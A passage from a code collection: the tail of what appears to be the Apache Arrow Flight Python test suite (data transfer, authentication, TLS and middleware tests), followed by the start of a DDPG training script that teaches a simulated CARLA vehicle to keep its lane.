with FlightServerBase():
raise ValueError()
@pytest.mark.slow
def test_client_wait_for_available():
location = ('localhost', find_free_port())
server = None
def serve():
global server
time.sleep(0.5)
server = FlightServerBase(location)
server.serve()
client = FlightClient(location)
thread = threading.Thread(target=serve, daemon=True)
thread.start()
started = time.time()
client.wait_for_available(timeout=5)
elapsed = time.time() - started
assert elapsed >= 0.5
def test_flight_list_flights():
"""Try a simple list_flights call."""
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
assert list(client.list_flights()) == []
flights = client.list_flights(ConstantFlightServer.CRITERIA)
assert len(list(flights)) == 1
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ConstantFlightServer(options=options) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
with pytest.raises(flight.FlightServerError,
match="expected IpcWriteOptions, got <class 'int'>"):
with ConstantFlightServer(options=42) as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.pandas
def test_do_get_ints_pandas():
"""Try a simple do_get call."""
table = simple_ints_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'ints')).read_pandas()
assert list(data['some_ints']) == table.column(0).to_pylist()
def test_flight_do_get_dicts():
table = simple_dicts_table()
with ConstantFlightServer() as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
def test_flight_do_get_ticket():
"""Make sure Tickets get passed to the server."""
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
with CheckTicketFlightServer(expected_ticket=b'the-ticket') as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'the-ticket')).read_all()
assert data.equals(table)
def test_flight_get_info():
"""Make sure FlightEndpoint accepts string and object URIs."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_flight_info(flight.FlightDescriptor.for_command(b''))
assert info.total_records == -1
assert info.total_bytes == -1
assert info.schema == pa.schema([('a', pa.int32())])
assert len(info.endpoints) == 2
assert len(info.endpoints[0].locations) == 1
assert info.endpoints[0].locations[0] == flight.Location('grpc://test')
assert info.endpoints[1].locations[0] == \
flight.Location.for_grpc_tcp('localhost', 5005)
def test_flight_get_schema():
"""Make sure GetSchema returns correct schema."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_schema(flight.FlightDescriptor.for_command(b''))
assert info.schema == pa.schema([('a', pa.int32())])
def test_list_actions():
"""Make sure the return type of ListActions is validated."""
# ARROW-6392
with ListActionsErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(
flight.FlightServerError,
match=("Results of list_actions must be "
"ActionType or tuple")
):
list(client.list_actions())
with ListActionsFlightServer() as server:
client = FlightClient(('localhost', server.port))
assert list(client.list_actions()) == \
ListActionsFlightServer.expected_actions()
class ConvenienceServer(FlightServerBase):
"""
Server for testing various implementation conveniences (auto-boxing, etc.)
"""
@property
def simple_action_results(self):
return [b'foo', b'bar', b'baz']
def do_action(self, context, action):
if action.type == 'simple-action':
return self.simple_action_results
elif action.type == 'echo':
return [action.body]
elif action.type == 'bad-action':
return ['foo']
elif action.type == 'arrow-exception':
raise pa.ArrowMemoryError()
def test_do_action_result_convenience():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
# do_action as action type without body
results = [x.body for x in client.do_action('simple-action')]
assert results == server.simple_action_results
# do_action with tuple of type and body
body = b'the-body'
results = [x.body for x in client.do_action(('echo', body))]
assert results == [body]
def test_nicer_server_exceptions():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightServerError,
match="a bytes-like object is required"):
list(client.do_action('bad-action'))
# While Flight/C++ sends across the original status code, it
# doesn't get mapped to the equivalent code here, since we
# want to be able to distinguish between client- and server-
# side errors.
with pytest.raises(flight.FlightServerError,
match="ArrowMemoryError"):
list(client.do_action('arrow-exception'))
def test_get_port():
"""Make sure port() works."""
server = GetInfoFlightServer("grpc://localhost:0")
try:
assert server.port > 0
finally:
server.shutdown()
@pytest.mark.skipif(os.name == 'nt',
reason="Unix sockets can't be tested on Windows")
def test_flight_domain_socket():
"""Try a simple do_get call over a Unix domain socket."""
with tempfile.NamedTemporaryFile() as sock:
sock.close()
location = flight.Location.for_grpc_unix(sock.name)
with ConstantFlightServer(location=location):
client = FlightClient(location)
reader = client.do_get(flight.Ticket(b'ints'))
table = simple_ints_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
reader = client.do_get(flight.Ticket(b'dicts'))
table = simple_dicts_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with EchoFlightServer(expected_schema=data.schema) as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with EchoStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with InvalidStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightTimedOutError):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
options = flight.FlightCallOptions(timeout=5.0)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
@pytest.mark.slow
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*unauthenticated.*"):
list(client.do_action(action))
@pytest.mark.skipif(os.name == 'nt',
reason="ARROW-10013: gRPC on Windows corrupts peer()")
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
results = client.do_action(action)
identity = next(results)
assert identity.body.to_pybytes() == b'test'
peer_address = next(results)
assert peer_address.body.to_pybytes() != b''
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*wrong password.*"):
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
def test_location_invalid():
"""Test constructing invalid URIs."""
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
flight.connect("%")
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
ConstantFlightServer("%")
def test_location_unknown_scheme():
"""Test creating locations for unknown schemes."""
assert flight.Location("s3://foo").uri == b"s3://foo"
assert flight.Location("https://example.com/bar.parquet").uri == \
b"https://example.com/bar.parquet"
@pytest.mark.slow
@pytest.mark.requires_testing_data
def test_tls_fails():
"""Make sure clients cannot connect when cert verification fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Ensure client doesn't connect when certificate verification
# fails (this is a slow test since gRPC does retry a few times)
client = FlightClient("grpc+tls://localhost:" + str(s.port))
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.requires_testing_data
def test_tls_do_get():
"""Try a simple do_get call over TLS."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = FlightClient(('localhost', s.port),
tls_root_certs=certs["root_cert"])
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_disable_server_verification():
"""Try a simple do_get call over TLS with server verification disabled."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
try:
client = FlightClient(('localhost', s.port),
disable_server_verification=True)
except NotImplementedError:
pytest.skip('disable_server_verification feature is not available')
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_override_hostname():
"""Check that incorrectly overriding the hostname fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
override_hostname="fakehostname")
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
def test_flight_do_get_metadata():
"""Try a simple do_get call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
batches = []
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
idx = 0
while True:
try:
batch, metadata = reader.read_chunk()
batches.append(batch)
server_idx, = struct.unpack('<i', metadata.to_pybytes())
assert idx == server_idx
idx += 1
except StopIteration:
break
data = pa.Table.from_batches(batches)
assert data.equals(table)
def test_flight_do_get_metadata_v4():
"""Try a simple do_get call with V4 metadata version."""
table = pa.Table.from_arrays(
[pa.array([-10, -5, 0, 5, 10])], names=['a'])
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with MetadataFlightServer(options=options) as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
data = reader.read_all()
assert data.equals(table)
def test_flight_do_put_metadata():
"""Try a simple do_put call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
with writer:
for idx, batch in enumerate(table.to_batches(max_chunksize=1)):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
buf = metadata_reader.read()
assert buf is not None
server_idx, = struct.unpack('<i', buf.to_pybytes())
assert idx == server_idx
def test_flight_do_put_limit():
"""Try a simple do_put call with a size limit."""
large_batch = pa.RecordBatch.from_arrays([
pa.array(np.ones(768, dtype=np.int64())),
], names=['a'])
with EchoFlightServer() as server:
client = FlightClient(('localhost', server.port),
write_size_limit_bytes=4096)
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
large_batch.schema)
with writer:
with pytest.raises(flight.FlightWriteSizeExceededError,
match="exceeded soft limit") as excinfo:
writer.write_batch(large_batch)
assert excinfo.value.limit == 4096
smaller_batches = [
large_batch.slice(0, 384),
large_batch.slice(384),
]
for batch in smaller_batches:
writer.write_batch(batch)
expected = pa.Table.from_batches([large_batch])
actual = client.do_get(flight.Ticket(b'')).read_all()
assert expected == actual
@pytest.mark.slow
def test_cancel_do_get():
"""Test canceling a DoGet operation on the client side."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
reader.cancel()
with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"):
reader.read_chunk()
@pytest.mark.slow
def test_cancel_do_get_threaded():
"""Test canceling a DoGet operation from another thread."""
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
read_first_message = threading.Event()
stream_canceled = threading.Event()
result_lock = threading.Lock()
raised_proper_exception = threading.Event()
def block_read():
reader.read_chunk()
read_first_message.set()
stream_canceled.wait(timeout=5)
try:
reader.read_chunk()
except flight.FlightCancelledError:
with result_lock:
raised_proper_exception.set()
thread = threading.Thread(target=block_read, daemon=True)
thread.start()
read_first_message.wait(timeout=5)
reader.cancel()
stream_canceled.set()
thread.join(timeout=1)
with result_lock:
assert raised_proper_exception.is_set()
def test_roundtrip_types():
"""Make sure serializable types round-trip."""
ticket = flight.Ticket("foo")
assert ticket == flight.Ticket.deserialize(ticket.serialize())
desc = flight.FlightDescriptor.for_command("test")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
info = flight.FlightInfo(
pa.schema([('a', pa.int32())]),
desc,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
info2 = flight.FlightInfo.deserialize(info.serialize())
assert info.schema == info2.schema
assert info.descriptor == info2.descriptor
assert info.total_bytes == info2.total_bytes
assert info.total_records == info2.total_records
assert info.endpoints == info2.endpoints
def test_roundtrip_errors():
"""Ensure that Flight errors propagate from server to client."""
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.do_action(flight.Action("internal", b"")))
with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"):
list(client.do_action(flight.Action("timedout", b"")))
with pytest.raises(flight.FlightCancelledError, match=".*foo.*"):
list(client.do_action(flight.Action("cancel", b"")))
with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthenticated", b"")))
with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthorized", b"")))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.list_flights())
def test_do_put_independent_read_write():
"""Ensure that separate threads can read/write on a DoPut."""
# ARROW-6063: previously this would cause gRPC to abort when the
# writer was closed (due to simultaneous reads), or would hang
# forever.
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
count = [0]
def _reader_thread():
while metadata_reader.read() is not None:
count[0] += 1
thread = threading.Thread(target=_reader_thread)
thread.start()
batches = table.to_batches(max_chunksize=1)
with writer:
for idx, batch in enumerate(batches):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
# Causes the server to stop writing and end the call
writer.done_writing()
# Thus reader thread will break out of loop
thread.join()
# writer.close() won't segfault since reader thread has
# stopped
assert count[0] == len(batches)
def test_server_middleware_same_thread():
"""Ensure that server middleware run on the same thread as the RPC."""
with HeaderFlightServer(middleware={
"test": HeaderServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
results = list(client.do_action(flight.Action(b"test", b"")))
assert len(results) == 1
value = results[0].body.to_pybytes()
assert b"right value" == value
def test_middleware_reject():
"""Test rejecting an RPC with server middleware."""
with HeaderFlightServer(middleware={
"test": SelectiveAuthServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
# The middleware allows this through without auth.
with pytest.raises(pa.ArrowNotImplementedError):
list(client.list_actions())
# But not anything else.
with pytest.raises(flight.FlightUnauthenticatedError):
list(client.do_action(flight.Action(b"", b"")))
client = FlightClient(
('localhost', server.port),
middleware=[SelectiveAuthClientMiddlewareFactory()]
)
response = next(client.do_action(flight.Action(b"", b"")))
assert b"password" == response.body.to_pybytes()
def test_middleware_mapping():
"""Test that middleware records methods correctly."""
server_middleware = RecordingServerMiddlewareFactory()
client_middleware = RecordingClientMiddlewareFactory()
with FlightServerBase(middleware={"test": server_middleware}) as server:
client = FlightClient(
('localhost', server.port),
middleware=[client_middleware]
)
descriptor = flight.FlightDescriptor.for_command(b"")
with pytest.raises(NotImplementedError):
list(client.list_flights())
with pytest.raises(NotImplementedError):
client.get_flight_info(descriptor)
with pytest.raises(NotImplementedError):
client.get_schema(descriptor)
with pytest.raises(NotImplementedError):
client.do_get(flight.Ticket(b""))
with pytest.raises(NotImplementedError):
writer, _ = client.do_put(descriptor, pa.schema([]))
writer.close()
with pytest.raises(NotImplementedError):
list(client.do_action(flight.Action(b"", b"")))
with pytest.raises(NotImplementedError):
list(client.list_actions())
with pytest.raises(NotImplementedError):
writer, _ = client.do_exchange(descriptor)
writer.close()
expected = [
flight.FlightMethod.LIST_FLIGHTS,
flight.FlightMethod.GET_FLIGHT_INFO,
flight.FlightMethod.GET_SCHEMA,
flight.FlightMethod.DO_GET,
flight.FlightMethod.DO_PUT,
flight.FlightMethod.DO_ACTION,
flight.FlightMethod.LIST_ACTIONS,
flight.FlightMethod.DO_EXCHANGE,
]
assert server_middleware.methods == expected
assert client_middleware.methods == expected
def test_extra_info():
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
try:
list(client.do_action(flight.Action("protobuf", b"")))
assert False
except flight.FlightUnauthorizedError as e:
assert e.extra_info is not None
ei = e.extra_info
assert ei == b'this is an error message'
@pytest.mark.requires_testing_data
def test_mtls():
"""Test mutual TLS (mTLS) with gRPC."""
certs = example_tls_certs()
table = simple_ints_table()
with ConstantFlightServer(
tls_certificates=[certs["certificates"][0]],
verify_client=True,
root_certificates=certs["root_cert"]) as s:
client = FlightClient(
('localhost', s.port),
tls_root_certs=certs["root_cert"],
cert_chain=certs["certificates"][0].cert,
private_key=certs["certificates"][0].key)
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
def test_doexchange_get():
"""Emulate DoGet with DoExchange."""
expected = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"get")
writer, reader = client.do_exchange(descriptor)
with writer:
table = reader.read_all()
assert expected == table
def test_doexchange_put():
"""Emulate DoPut with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"put")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
writer.done_writing()
chunk = reader.read_chunk()
assert chunk.data is None
expected_buf = str(len(batches)).encode("utf-8")
assert chunk.app_metadata == expected_buf
def test_doexchange_echo():
"""Try a DoExchange echo server."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Read/write metadata before starting data.
for i in range(10):
buf = str(i).encode("utf-8")
writer.write_metadata(buf)
chunk = reader.read_chunk()
assert chunk.data is None
assert chunk.app_metadata == buf
# Now write data without metadata.
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
# And write data with metadata.
for i, batch in enumerate(batches):
buf = str(i).encode("utf-8")
writer.write_with_metadata(batch, buf)
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata == buf
def test_doexchange_echo_v4():
"""Try a DoExchange echo server using the V4 metadata version."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ExchangeFlightServer(options=options) as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Now write data without metadata.
writer.begin(data.schema, options=options)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
def test_doexchange_transform():
"""Transform a table with a service."""
data = pa.Table.from_arrays([
pa.array(range(0, 1024)),
pa.array(range(1, 1025)),
pa.array(range(2, 1026)),
], names=["a", "b", "c"])
expected = pa.Table.from_arrays([
pa.array(range(3, 1024 * 3 + 3, 3)),
], names=["sum"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"transform")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
writer.write_table(data)
writer.done_writing()
table = reader.read_all()
assert expected == table
def test_middleware_multi_header():
"""Test sending/receiving multiple (binary-valued) headers."""
with MultiHeaderFlightServer(middleware={
"test": MultiHeaderServerMiddlewareFactory(),
}) as server:
headers = MultiHeaderClientMiddlewareFactory()
client = FlightClient(('localhost', server.port), middleware=[headers])
response = next(client.do_action(flight.Action(b"", b"")))
# The server echoes the headers it got back to us.
raw_headers = response.body.to_pybytes().decode("utf-8")
client_headers = ast.literal_eval(raw_headers)
# Don't directly compare; gRPC may add headers like User-Agent.
for header, values in MultiHeaderClientMiddleware.EXPECTED.items():
assert client_headers.get(header) == values
assert headers.last_headers.get(header) == values
@pytest.mark.requires_testing_data
def test_generic_options():
"""Test setting generic client options."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Try setting a string argument that will make requests fail
options = [("grpc.ssl_target_name_override", "fakehostname")]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
# Try setting an int argument that will make requests fail
options = [("grpc.max_receive_message_length", 32)]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(pa.ArrowInvalid):
client.do_get(flight.Ticket(b'ints'))
|
ddpg_train_2.py
|
"""
Copyright (c) College of Mechatronics and Control Engineering, Shenzhen University.
All rights reserved.
Description :
this script would teach the vehicle how to keep lane
Author:Team Li
"""
import sys, os, glob, threading, math, time
import tensorflow as tf
import cv2
import keep_lane.basic_net.ddpg_utils as ddpg
import RL.rl_utils as rl_tools
try:
sys.path.append('F:\my_project\driving-desicion-in-carla\dist/carla-0.9.4-py3.7-win-amd64.egg')
import carla
except:
raise ImportError('Please check your carla file')
from carla_utils.world_ops import *
from carla_utils.sensor_ops import *
tf.app.flags.DEFINE_string(
'checkpoint_dir', '',
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'imitator_checkpoint_dir', '',
'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
'train_dir', '../checkpoint/',
'Directory where checkpoints are written to.')
tf.app.flags.DEFINE_integer(
'batch_size', 20, 'The number of samples in each batch.')
tf.app.flags.DEFINE_float('critic_learning_rate', 1e-1, 'Initial learning rate.')
tf.app.flags.DEFINE_float('actor_learning_rate', 1e-1, 'Initial learning rate.')
tf.app.flags.DEFINE_integer(
'img_height', 416,
'raw image height')
tf.app.flags.DEFINE_integer(
'img_width', 626,
'raw image width')
tf.app.flags.DEFINE_integer(
'log_every_n_steps', 20,
'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
'f_save_step', 2000,
'The frequency with which summaries are saved, in step.')
tf.app.flags.DEFINE_integer(
'n_egopilots', 1,
'the number of egopilots')
FLAGS = tf.app.flags.FLAGS
## carla config ##
semantic_camera_config = {'data_type': 'sensor.camera.semantic_segmentation', 'image_size_x': FLAGS.img_width,
'image_size_y': FLAGS.img_height, 'fov': 110, 'sensor_tick': 0.02,
'transform': carla.Transform(carla.Location(x=0.5, z=1.6)),
'attach_to':None}
bgr_camera_config = {'data_type': 'sensor.camera.rgb', 'image_size_x': FLAGS.img_width,
'image_size_y': FLAGS.img_height, 'fov': 110, 'sensor_tick': 0.02,
'transform': carla.Transform(carla.Location(x=-4, z=3)),
'attach_to':None}
collision_sensor_config = {'data_type': 'sensor.other.collision','attach_to': None}
invasion_sensor_config = {'data_type': 'sensor.other.lane_detector', 'attach_to': None}
obstacle_sensor_config = {'data_type': 'sensor.other.obstacle', 'sensor_tick': 0.02,
'distance': 3, 'attach_to': None}
def gaussian_r(val, mu=30., sigma=10.):
"""calculate the reward of velocity
Args:
vel: velocity, km/h
Return:
a reward
"""
# if vel > 80:
# return 5.
r = math.exp(-((val - mu) ** 2) / (2 * sigma ** 2))
return r
def single_execuate(target, args):
threading.Thread(target=target, args=args).start()
def check_whether_respawn_actors(world, vehicles):
"""check whether to respawn the static acotors in a frequency"""
while True:
if carla_actors_static(vehicles, bigger_than=0.75):
respawn_static_actors(world, vehicles)
time.sleep(20)
# def respwan_vehicles_in_traffic_light():
# while True:
# for egopilot in egopilots:
# if egopilot.is_at_traffic_light():
# print('respwan car in traffic light')
# single_execuate(target=respawn_actors, args=(world, [egopilot],))
# time.sleep(0.1)
def target_thread(sess, online_begin_signal):
"""a thread for target nets in DDPG"""
begin = True
exploration_noise = rl_tools.exploration_noise(theta=10., size=1)
avg_r = 0.
episode = 0
prev_contrl = np.zeros(shape=[FLAGS.n_egopilots, 1])
while True:
## get current state
imgs = []
for camera_sensor in cameras:
img = camera_sensor.get()
img = img[int(FLAGS.img_height*1.8//5):, :, :] ## corp the ROI
img = cv2.resize(img, dsize=(224, 224))
# cv2.imshow('test', img)
imgs.append(img)
current_img_state = np.array(imgs)
current_img_state = current_img_state*2./255. - 1.
## get current action and control the egopilots
current_action = sess.run(action_online, feed_dict={online_img_state: current_img_state})
## soft
# current_action = 0.5 * current_action + 0.5 * prev_contrl
## control the egopilots ##
for egopilot, c_a in zip(egopilots, current_action):
## add exploration noise
c_a = np.clip(c_a+np.expand_dims(5*exploration_noise.generate(episode//FLAGS.n_egopilots), axis=0), a_min=[-1.], a_max=[1.])[0]
steer = float(c_a[0])
throttle = 0.5
brake = 0.
ego_v = egopilot.get_velocity()
ego_v = math.sqrt(ego_v.x ** 2 + ego_v.y ** 2 + ego_v.z ** 2)
if ego_v > 8. and throttle > 0.5:
throttle = 0.5 ## avoid velocity too big
## apply control
egopilot.apply_control(carla.VehicleControl(throttle=throttle, steer=steer, brake=brake))
prev_contrl = current_action
# cv2.waitKey(300)
time.sleep(0.5) ## sleep for a while, let the action control the egopilots to next state
## reward calculation
r_s = np.zeros(shape=(len(egopilots))) ## init is 0 reward
## about the velocity and steer
for i, egopilot in enumerate(egopilots):
v = egopilot.get_velocity()
v = math.sqrt(v.x ** 2 + v.y ** 2 + v.z ** 2)
#
# if v <= 6:
# r_s[i] += v**2/6.
# elif v <= 8:
# r_s[i] += 3 * (8 - v)
# else:
# r_s[i] -= 2 * (v - 8) ** 2
#
# if egopilot.get_control().steer > 0.1 :
# r_s[i] = 0
## make steer small as possible
if v >= 0.1: ##m/s
r_s[i] += (10*(gaussian_r(egopilot.get_control().steer, mu=0., sigma=0.05)) - 5)
else:
r_s[i] = 0.
## about the collision and lane invasion
end = np.zeros(len(egopilots)).astype(np.float32)
i = 0
for egopilot, lane_invasion, obj_collision in zip(egopilots, lane_invasions, obj_collisions):
on_collision = obj_collision.get()
on_invasion = lane_invasion.get()
# if on_collision:
# r_s[i] -= 30
# end[i] = 1.
# episode += 1
# obj_collision.clear()
# single_execuate(target=respawn_actors, args=(world, [egopilot],))
if on_invasion:
episode += 1
r_s[i] -= 30
end[i] = 1.
lane_invasion.clear()
single_execuate(target=respawn_actors, args=(world, [egopilot],))
i += 1
# print('a_r:', r_s)
## get next state
imgs = []
for camera_sensor, egopilot in zip(cameras, egopilots):
img = camera_sensor.get()
img = img[int(FLAGS.img_height*1.8//5):, :, :] ## corp the ROI
img = cv2.resize(img, dsize=(224, 224))
imgs.append(img)
next_img_state = np.array(imgs)
next_img_state = next_img_state * 2. / 255. - 1.
